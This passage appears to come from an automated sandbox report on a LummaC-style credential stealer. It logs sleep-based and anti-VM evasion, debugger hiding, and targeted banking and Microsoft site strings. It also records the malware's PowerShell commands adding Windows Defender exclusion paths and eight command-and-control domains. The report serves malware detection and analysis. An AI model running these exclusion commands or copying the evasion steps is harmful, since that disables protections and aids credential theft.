                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeWindow / User API: threadDelayed 7559Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeWindow / User API: threadDelayed 2039Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7794Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1776Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8037Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1520Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 3452Thread sleep count: 7559 > 30Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 3452Thread sleep count: 2039 > 30Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep count: 37 > 30Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -34126476536362649s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -599877s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -599750s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -599631s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -599512s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -599406s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -599221s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -599094s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -598984s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -598875s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -598766s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -598656s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -598547s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -598436s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -598328s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -598219s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -598094s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -597984s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -597875s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -597765s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -597656s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -597547s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -597437s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -597328s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -597219s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -597108s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -597000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -596871s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -596765s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -596631s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -596500s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -596390s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -596281s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -596172s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -596047s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -595937s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -595828s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -595712s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -595606s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -595500s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -595390s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -595281s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -595172s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -595047s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -594937s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -594828s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -594719s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -594594s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exe TID: 1560Thread sleep time: -594484s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4668Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6528Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe TID: 6196Thread sleep count: 247 > 30Jump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe TID: 6204Thread sleep time: -180000s >= -30000sJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe TID: 6204Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 599877Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 599750Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 599631Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 599512Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 599406Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 599221Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 599094Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 598984Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 598875Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 598766Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 598656Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 598547Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 598436Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 598328Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 598219Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 598094Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 597984Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 597875Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 597765Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 597656Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 597547Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 597437Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 597328Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 597219Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 597108Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 597000Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 596871Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 596765Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 596631Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 596500Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 596390Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 596281Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 596172Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 596047Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 595937Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 595828Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 595712Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 595606Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 595500Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 595390Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 595281Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 595172Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 595047Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 594937Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 594828Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 594719Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 594594Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeThread delayed: delay time: 594484Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2214946722.0000000003963000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2360203323.00000000006F8000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2183388479.00000000006F8000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000002.2361624208.00000000006F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2361527926.000000000068E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2362101522.0000000000EF3000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: &VBoxService.exe
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: OiMp3TH.exe, 00000000.00000002.4460315252.00000000013F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll <
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2360203323.00000000006F8000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2183388479.00000000006F8000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000002.2361624208.00000000006F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW!
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2362101522.0000000000EF3000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: VBoxService.exe
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2362101522.000000000103D000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: ~VirtualMachineTypes
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2214946722.0000000003963000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2362101522.000000000103D000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: ]DLL_Loader_VirtualMachine
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2362101522.0000000000EF3000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: VMWare
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2362101522.000000000103D000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2215151864.00000000038F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\nhrhvnf'
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users'
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\nhrhvnf'Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users'Jump to behavior
                LummaC encrypted strings found
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2362101522.0000000000EA1000.00000040.00000001.01000000.00000007.sdmpString found in binary or memory: hummskitnj.buzz
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2362101522.0000000000EA1000.00000040.00000001.01000000.00000007.sdmpString found in binary or memory: cashfuzysao.buzz
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2362101522.0000000000EA1000.00000040.00000001.01000000.00000007.sdmpString found in binary or memory: appliacnesot.buzz
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2362101522.0000000000EA1000.00000040.00000001.01000000.00000007.sdmpString found in binary or memory: screwamusresz.buzz
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2362101522.0000000000EA1000.00000040.00000001.01000000.00000007.sdmpString found in binary or memory: inherineau.buzz
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2362101522.0000000000EA1000.00000040.00000001.01000000.00000007.sdmpString found in binary or memory: scentniej.buzz
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2362101522.0000000000EA1000.00000040.00000001.01000000.00000007.sdmpString found in binary or memory: rebuildeso.buzz
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2362101522.0000000000EA1000.00000040.00000001.01000000.00000007.sdmpString found in binary or memory: prisonyfork.buzz
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\nhrhvnf'Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users'Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess created: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe "C:\nhrhvnf\ghhqoznpon_638708802577261661.exe" Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeQueries volume information: C:\Users\user\Desktop\OiMp3TH.exe VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
